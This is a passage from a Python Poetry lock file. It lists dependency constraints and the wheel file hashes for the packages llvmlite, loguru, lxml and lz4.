numba = ">=0.51.0" numpy = ">=1.20.3,<1.22.0 || >1.22.0,<1.22.1 || >1.22.1,<1.22.2 || >1.22.2" pooch = ">=1.0" scikit-learn = ">=0.20.0" scipy = ">=1.2.0" soundfile = ">=0.12.1" soxr = ">=0.3.2" typing-extensions = ">=4.1.1" [package.extras] display = ["matplotlib (>=3.3.0)"] docs = ["ipython (>=7.0)", "matplotlib (>=3.3.0)", "mir-eval (>=0.5)", "numba (>=0.51)", "numpydoc", "presets", "sphinx (!=1.3.1)", "sphinx-gallery (>=0.7)", "sphinx-multiversion (>=0.2.3)", "sphinx-rtd-theme (>=1.2.0)", "sphinxcontrib-svg2pdfconverter"] tests = ["matplotlib (>=3.3.0)", "packaging (>=20.0)", "pytest", "pytest-cov", "pytest-mpl", "resampy (>=0.2.2)", "samplerate", "types-decorator"] [[package]] name = "llvmlite" version = "0.41.1" description = "lightweight wrapper around basic LLVM functionality" optional = true python-versions = ">=3.8" files = [ {file = "llvmlite-0.41.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c1e1029d47ee66d3a0c4d6088641882f75b93db82bd0e6178f7bd744ebce42b9"}, {file = "llvmlite-0.41.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:150d0bc275a8ac664a705135e639178883293cf08c1a38de3bbaa2f693a0a867"}, {file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1eee5cf17ec2b4198b509272cf300ee6577229d237c98cc6e63861b08463ddc6"}, {file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd0338da625346538f1173a17cabf21d1e315cf387ca21b294ff209d176e244"}, {file = "llvmlite-0.41.1-cp310-cp310-win32.whl", hash = "sha256:fa1469901a2e100c17eb8fe2678e34bd4255a3576d1a543421356e9c14d6e2ae"}, {file = "llvmlite-0.41.1-cp310-cp310-win_amd64.whl", hash = "sha256:2b76acee82ea0e9304be6be9d4b3840208d050ea0dcad75b1635fa06e949a0ae"}, {file = "llvmlite-0.41.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:210e458723436b2469d61b54b453474e09e12a94453c97ea3fbb0742ba5a83d8"}, {file = "llvmlite-0.41.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:855f280e781d49e0640aef4c4af586831ade8f1a6c4df483fb901cbe1a48d127"}, {file = 
"llvmlite-0.41.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b67340c62c93a11fae482910dc29163a50dff3dfa88bc874872d28ee604a83be"}, {file = "llvmlite-0.41.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2181bb63ef3c607e6403813421b46982c3ac6bfc1f11fa16a13eaafb46f578e6"}, {file = "llvmlite-0.41.1-cp311-cp311-win_amd64.whl", hash = "sha256:9564c19b31a0434f01d2025b06b44c7ed422f51e719ab5d24ff03b7560066c9a"}, {file = "llvmlite-0.41.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5940bc901fb0325970415dbede82c0b7f3e35c2d5fd1d5e0047134c2c46b3281"}, {file = "llvmlite-0.41.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8b0a9a47c28f67a269bb62f6256e63cef28d3c5f13cbae4fab587c3ad506778b"}, {file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8afdfa6da33f0b4226af8e64cfc2b28986e005528fbf944d0a24a72acfc9432"}, {file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8454c1133ef701e8c050a59edd85d238ee18bb9a0eb95faf2fca8b909ee3c89a"}, {file = "llvmlite-0.41.1-cp38-cp38-win32.whl", hash = "sha256:2d92c51e6e9394d503033ffe3292f5bef1566ab73029ec853861f60ad5c925d0"}, {file = "llvmlite-0.41.1-cp38-cp38-win_amd64.whl", hash = "sha256:df75594e5a4702b032684d5481db3af990b69c249ccb1d32687b8501f0689432"}, {file = "llvmlite-0.41.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:04725975e5b2af416d685ea0769f4ecc33f97be541e301054c9f741003085802"}, {file = "llvmlite-0.41.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bf14aa0eb22b58c231243dccf7e7f42f7beec48970f2549b3a6acc737d1a4ba4"}, {file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:92c32356f669e036eb01016e883b22add883c60739bc1ebee3a1cc0249a50828"}, {file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:24091a6b31242bcdd56ae2dbea40007f462260bc9bdf947953acc39dffd54f8f"}, {file = "llvmlite-0.41.1-cp39-cp39-win32.whl", hash = "sha256:880cb57ca49e862e1cd077104375b9d1dfdc0622596dfa22105f470d7bacb309"}, {file = "llvmlite-0.41.1-cp39-cp39-win_amd64.whl", hash = "sha256:92f093986ab92e71c9ffe334c002f96defc7986efda18397d0f08534f3ebdc4d"}, {file = "llvmlite-0.41.1.tar.gz", hash = "sha256:f19f767a018e6ec89608e1f6b13348fa2fcde657151137cb64e56d48598a92db"}, ] [[package]] name = "loguru" version = "0.7.2" description = "Python logging made (stupidly) simple" optional = true python-versions = ">=3.5" files = [ {file = "loguru-0.7.2-py3-none-any.whl", hash = "sha256:003d71e3d3ed35f0f8984898359d65b79e5b21943f78af86aa5491210429b8eb"}, {file = "loguru-0.7.2.tar.gz", hash = "sha256:e671a53522515f34fd406340ee968cb9ecafbc4b36c679da03c18fd8d0bd51ac"}, ] [package.dependencies] colorama = {version = ">=0.3.4", markers = "sys_platform == \"win32\""} win32-setctime = {version = ">=1.0.0", markers = "sys_platform == \"win32\""} [package.extras] dev = ["Sphinx (==7.2.5)", "colorama (==0.4.5)", "colorama (==0.4.6)", "exceptiongroup (==1.1.3)", "freezegun (==1.1.0)", "freezegun (==1.2.2)", "mypy (==v0.910)", "mypy (==v0.971)", "mypy (==v1.4.1)", "mypy (==v1.5.1)", "pre-commit (==3.4.0)", "pytest (==6.1.2)", "pytest (==7.4.0)", "pytest-cov (==2.12.1)", "pytest-cov (==4.1.0)", "pytest-mypy-plugins (==1.9.3)", "pytest-mypy-plugins (==3.0.0)", "sphinx-autobuild (==2021.3.14)", "sphinx-rtd-theme (==1.3.0)", "tox (==3.27.1)", "tox (==4.11.0)"] [[package]] name = "lxml" version = "4.9.3" description = "Powerful and Pythonic XML processing library combining 
libxml2/libxslt with the ElementTree API." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, != 3.4.*" files = [ {file = "lxml-4.9.3-cp27-cp27m-macosx_11_0_x86_64.whl", hash = "sha256:b0a545b46b526d418eb91754565ba5b63b1c0b12f9bd2f808c852d9b4b2f9b5c"}, {file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:075b731ddd9e7f68ad24c635374211376aa05a281673ede86cbe1d1b3455279d"}, {file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:1e224d5755dba2f4a9498e150c43792392ac9b5380aa1b845f98a1618c94eeef"}, {file = "lxml-4.9.3-cp27-cp27m-win32.whl", hash = "sha256:2c74524e179f2ad6d2a4f7caf70e2d96639c0954c943ad601a9e146c76408ed7"}, {file = "lxml-4.9.3-cp27-cp27m-win_amd64.whl", hash = "sha256:4f1026bc732b6a7f96369f7bfe1a4f2290fb34dce00d8644bc3036fb351a4ca1"}, {file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c0781a98ff5e6586926293e59480b64ddd46282953203c76ae15dbbbf302e8bb"}, {file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cef2502e7e8a96fe5ad686d60b49e1ab03e438bd9123987994528febd569868e"}, {file = "lxml-4.9.3-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b86164d2cff4d3aaa1f04a14685cbc072efd0b4f99ca5708b2ad1b9b5988a991"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:42871176e7896d5d45138f6d28751053c711ed4d48d8e30b498da155af39aebd"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:ae8b9c6deb1e634ba4f1930eb67ef6e6bf6a44b6eb5ad605642b2d6d5ed9ce3c"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:411007c0d88188d9f621b11d252cce90c4a2d1a49db6c068e3c16422f306eab8"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:cd47b4a0d41d2afa3e58e5bf1f62069255aa2fd6ff5ee41604418ca925911d76"}, {file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e2cb47860da1f7e9a5256254b74ae331687b9672dfa780eed355c4c9c3dbd23"}, {file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1247694b26342a7bf47c02e513d32225ededd18045264d40758abeb3c838a51f"}, {file = "lxml-4.9.3-cp310-cp310-win32.whl", hash = "sha256:cdb650fc86227eba20de1a29d4b2c1bfe139dc75a0669270033cb2ea3d391b85"}, {file = "lxml-4.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:97047f0d25cd4bcae81f9ec9dc290ca3e15927c192df17331b53bebe0e3ff96d"}, {file = "lxml-4.9.3-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:1f447ea5429b54f9582d4b955f5f1985f278ce5cf169f72eea8afd9502973dd5"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:57d6ba0ca2b0c462f339640d22882acc711de224d769edf29962b09f77129cbf"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:9767e79108424fb6c3edf8f81e6730666a50feb01a328f4a016464a5893f835a"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:71c52db65e4b56b8ddc5bb89fb2e66c558ed9d1a74a45ceb7dcb20c191c3df2f"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:d73d8ecf8ecf10a3bd007f2192725a34bd62898e8da27eb9d32a58084f93962b"}, {file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0a3d3487f07c1d7f150894c238299934a2a074ef590b583103a45002035be120"}, {file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = 
"sha256:9e28c51fa0ce5674be9f560c6761c1b441631901993f76700b1b30ca6c8378d6"}, {file = "lxml-4.9.3-cp311-cp311-win32.whl", hash = "sha256:0bfd0767c5c1de2551a120673b72e5d4b628737cb05414f03c3277bf9bed3305"}, {file = "lxml-4.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:25f32acefac14ef7bd53e4218fe93b804ef6f6b92ffdb4322bb6d49d94cad2bc"}, {file = "lxml-4.9.3-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:d3ff32724f98fbbbfa9f49d82852b159e9784d6094983d9a8b7f2ddaebb063d4"}, {file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:48d6ed886b343d11493129e019da91d4039826794a3e3027321c56d9e71505be"}, {file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9a92d3faef50658dd2c5470af249985782bf754c4e18e15afb67d3ab06233f13"}, {file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b4e4bc18382088514ebde9328da057775055940a1f2e18f6ad2d78aa0f3ec5b9"}, {file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fc9b106a1bf918db68619fdcd6d5ad4f972fdd19c01d19bdb6bf63f3589a9ec5"}, {file = "lxml-4.9.3-cp312-cp312-win_amd64.whl", hash = "sha256:d37017287a7adb6ab77e1c5bee9bcf9660f90ff445042b790402a654d2ad81d8"}, {file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:56dc1f1ebccc656d1b3ed288f11e27172a01503fc016bcabdcbc0978b19352b7"}, {file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:578695735c5a3f51569810dfebd05dd6f888147a34f0f98d4bb27e92b76e05c2"}, {file = "lxml-4.9.3-cp35-cp35m-win32.whl", hash = "sha256:704f61ba8c1283c71b16135caf697557f5ecf3e74d9e453233e4771d68a1f42d"}, {file = "lxml-4.9.3-cp35-cp35m-win_amd64.whl", hash = "sha256:c41bfca0bd3532d53d16fd34d20806d5c2b1ace22a2f2e4c0008570bf2c58833"}, {file = "lxml-4.9.3-cp36-cp36m-macosx_11_0_x86_64.whl", hash = "sha256:64f479d719dc9f4c813ad9bb6b28f8390360660b73b2e4beb4cb0ae7104f1c12"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:dd708cf4ee4408cf46a48b108fb9427bfa00b9b85812a9262b5c668af2533ea5"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5c31c7462abdf8f2ac0577d9f05279727e698f97ecbb02f17939ea99ae8daa98"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e3cd95e10c2610c360154afdc2f1480aea394f4a4f1ea0a5eacce49640c9b190"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_28_x86_64.whl", hash = "sha256:4930be26af26ac545c3dffb662521d4e6268352866956672231887d18f0eaab2"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4aec80cde9197340bc353d2768e2a75f5f60bacda2bab72ab1dc499589b3878c"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:14e019fd83b831b2e61baed40cab76222139926b1fb5ed0e79225bc0cae14584"}, {file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:0c0850c8b02c298d3c7006b23e98249515ac57430e16a166873fc47a5d549287"}, {file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:aca086dc5f9ef98c512bac8efea4483eb84abbf926eaeedf7b91479feb092458"}, {file = "lxml-4.9.3-cp36-cp36m-win32.whl", hash = "sha256:50baa9c1c47efcaef189f31e3d00d697c6d4afda5c3cde0302d063492ff9b477"}, {file = "lxml-4.9.3-cp36-cp36m-win_amd64.whl", hash = "sha256:bef4e656f7d98aaa3486d2627e7d2df1157d7e88e7efd43a65aa5dd4714916cf"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = 
"sha256:46f409a2d60f634fe550f7133ed30ad5321ae2e6630f13657fb9479506b00601"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:4c28a9144688aef80d6ea666c809b4b0e50010a2aca784c97f5e6bf143d9f129"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:141f1d1a9b663c679dc524af3ea1773e618907e96075262726c7612c02b149a4"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_28_x86_64.whl", hash = "sha256:53ace1c1fd5a74ef662f844a0413446c0629d151055340e9893da958a374f70d"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:17a753023436a18e27dd7769e798ce302963c236bc4114ceee5b25c18c52c693"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:7d298a1bd60c067ea75d9f684f5f3992c9d6766fadbc0bcedd39750bf344c2f4"}, {file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:081d32421db5df44c41b7f08a334a090a545c54ba977e47fd7cc2deece78809a"}, {file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:23eed6d7b1a3336ad92d8e39d4bfe09073c31bfe502f20ca5116b2a334f8ec02"}, {file = "lxml-4.9.3-cp37-cp37m-win32.whl", hash = "sha256:1509dd12b773c02acd154582088820893109f6ca27ef7291b003d0e81666109f"}, {file = "lxml-4.9.3-cp37-cp37m-win_amd64.whl", hash = "sha256:120fa9349a24c7043854c53cae8cec227e1f79195a7493e09e0c12e29f918e52"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4d2d1edbca80b510443f51afd8496be95529db04a509bc8faee49c7b0fb6d2cc"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:8d7e43bd40f65f7d97ad8ef5c9b1778943d02f04febef12def25f7583d19baac"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:71d66ee82e7417828af6ecd7db817913cb0cf9d4e61aa0ac1fde0583d84358db"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:6fc3c450eaa0b56f815c7b62f2b7fba7266c4779adcf1cece9e6deb1de7305ce"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:65299ea57d82fb91c7f019300d24050c4ddeb7c5a190e076b5f48a2b43d19c42"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:eadfbbbfb41b44034a4c757fd5d70baccd43296fb894dba0295606a7cf3124aa"}, {file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3e9bdd30efde2b9ccfa9cb5768ba04fe71b018a25ea093379c857c9dad262c40"}, {file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fcdd00edfd0a3001e0181eab3e63bd5c74ad3e67152c84f93f13769a40e073a7"}, {file = "lxml-4.9.3-cp38-cp38-win32.whl", hash = "sha256:57aba1bbdf450b726d58b2aea5fe47c7875f5afb2c4a23784ed78f19a0462574"}, {file = "lxml-4.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:92af161ecbdb2883c4593d5ed4815ea71b31fafd7fd05789b23100d081ecac96"}, {file = "lxml-4.9.3-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:9bb6ad405121241e99a86efff22d3ef469024ce22875a7ae045896ad23ba2340"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8ed74706b26ad100433da4b9d807eae371efaa266ffc3e9191ea436087a9d6a7"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:fbf521479bcac1e25a663df882c46a641a9bff6b56dc8b0fafaebd2f66fb231b"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_aarch64.whl", hash = 
"sha256:303bf1edce6ced16bf67a18a1cf8339d0db79577eec5d9a6d4a80f0fb10aa2da"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:5515edd2a6d1a5a70bfcdee23b42ec33425e405c5b351478ab7dc9347228f96e"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:690dafd0b187ed38583a648076865d8c229661ed20e48f2335d68e2cf7dc829d"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b6420a005548ad52154c8ceab4a1290ff78d757f9e5cbc68f8c77089acd3c432"}, {file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:bb3bb49c7a6ad9d981d734ef7c7193bc349ac338776a0360cc671eaee89bcf69"}, {file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d27be7405547d1f958b60837dc4c1007da90b8b23f54ba1f8b728c78fdb19d50"}, {file = "lxml-4.9.3-cp39-cp39-win32.whl", hash = "sha256:8df133a2ea5e74eef5e8fc6f19b9e085f758768a16e9877a60aec455ed2609b2"}, {file = "lxml-4.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:4dd9a263e845a72eacb60d12401e37c616438ea2e5442885f65082c276dfb2b2"}, {file = "lxml-4.9.3-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:6689a3d7fd13dc687e9102a27e98ef33730ac4fe37795d5036d18b4d527abd35"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:f6bdac493b949141b733c5345b6ba8f87a226029cbabc7e9e121a413e49441e0"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:05186a0f1346ae12553d66df1cfce6f251589fea3ad3da4f3ef4e34b2d58c6a3"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:c2006f5c8d28dee289f7020f721354362fa304acbaaf9745751ac4006650254b"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-macosx_11_0_x86_64.whl", hash = "sha256:5c245b783db29c4e4fbbbfc9c5a78be496c9fea25517f90606aa1f6b2b3d5f7b"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4fb960a632a49f2f089d522f70496640fdf1218f1243889da3822e0a9f5f3ba7"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:50670615eaf97227d5dc60de2dc99fb134a7130d310d783314e7724bf163f75d"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:9719fe17307a9e814580af1f5c6e05ca593b12fb7e44fe62450a5384dbf61b4b"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:3331bece23c9ee066e0fb3f96c61322b9e0f54d775fccefff4c38ca488de283a"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-macosx_11_0_x86_64.whl", hash = "sha256:ed667f49b11360951e201453fc3967344d0d0263aa415e1619e85ae7fd17b4e0"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8b77946fd508cbf0fccd8e400a7f71d4ac0e1595812e66025bac475a8e811694"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e4da8ca0c0c0aea88fd46be8e44bd49716772358d648cce45fe387f7b92374a7"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fe4bda6bd4340caa6e5cf95e73f8fea5c4bfc55763dd42f1b50a94c1b4a2fbd4"}, {file = "lxml-4.9.3-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:f3df3db1d336b9356dd3112eae5f5c2b8b377f3bc826848567f10bfddfee77e9"}, {file = "lxml-4.9.3.tar.gz", hash = "sha256:48628bd53a426c9eb9bc066a923acaa0878d1e86129fd5359aee99285f4eed9c"}, ] [package.extras] cssselect = ["cssselect (>=0.7)"] html5 = ["html5lib"] htmlsoup = 
["BeautifulSoup4"] source = ["Cython (>=0.29.35)"] [[package]] name = "lz4" version = "4.3.2" description = "LZ4 Bindings for Python" optional = true python-versions = ">=3.7" files = [ {file = "lz4-4.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1c4c100d99eed7c08d4e8852dd11e7d1ec47a3340f49e3a96f8dfbba17ffb300"}, {file = "lz4-4.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:edd8987d8415b5dad25e797043936d91535017237f72fa456601be1479386c92"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f7c50542b4ddceb74ab4f8b3435327a0861f06257ca501d59067a6a482535a77"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f5614d8229b33d4a97cb527db2a1ac81308c6e796e7bdb5d1309127289f69d5"}, {file = "lz4-4.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8f00a9ba98f6364cadda366ae6469b7b3568c0cced27e16a47ddf6b774169270"}, {file = "lz4-4.3.2-cp310-cp310-win32.whl", hash = "sha256:b10b77dc2e6b1daa2f11e241141ab8285c42b4ed13a8642495620416279cc5b2"}, {file = "lz4-4.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:86480f14a188c37cb1416cdabacfb4e42f7a5eab20a737dac9c4b1c227f3b822"}, {file = "lz4-4.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7c2df117def1589fba1327dceee51c5c2176a2b5a7040b45e84185ce0c08b6a3"}, {file = "lz4-4.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1f25eb322eeb24068bb7647cae2b0732b71e5c639e4e4026db57618dcd8279f0"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8df16c9a2377bdc01e01e6de5a6e4bbc66ddf007a6b045688e285d7d9d61d1c9"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f571eab7fec554d3b1db0d666bdc2ad85c81f4b8cb08906c4c59a8cad75e6e22"}, {file = "lz4-4.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7211dc8f636ca625abc3d4fb9ab74e5444b92df4f8d58ec83c8868a2b0ff643d"}, {file = "lz4-4.3.2-cp311-cp311-win32.whl", hash = "sha256:867664d9ca9bdfce840ac96d46cd8838c9ae891e859eb98ce82fcdf0e103a947"}, {file = "lz4-4.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:a6a46889325fd60b8a6b62ffc61588ec500a1883db32cddee9903edfba0b7584"}, {file = "lz4-4.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3a85b430138882f82f354135b98c320dafb96fc8fe4656573d95ab05de9eb092"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:65d5c93f8badacfa0456b660285e394e65023ef8071142e0dcbd4762166e1be0"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6b50f096a6a25f3b2edca05aa626ce39979d63c3b160687c8c6d50ac3943d0ba"}, {file = "lz4-4.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:200d05777d61ba1ff8d29cb51c534a162ea0b4fe6d3c28be3571a0a48ff36080"}, {file = "lz4-4.3.2-cp37-cp37m-win32.whl", hash = "sha256:edc2fb3463d5d9338ccf13eb512aab61937be50aa70734bcf873f2f493801d3b"}, {file = "lz4-4.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:83acfacab3a1a7ab9694333bcb7950fbeb0be21660d236fd09c8337a50817897"}, {file = "lz4-4.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:7a9eec24ec7d8c99aab54de91b4a5a149559ed5b3097cf30249b665689b3d402"}, {file = "lz4-4.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:31d72731c4ac6ebdce57cd9a5cabe0aecba229c4f31ba3e2c64ae52eee3fdb1c"}, {file = 
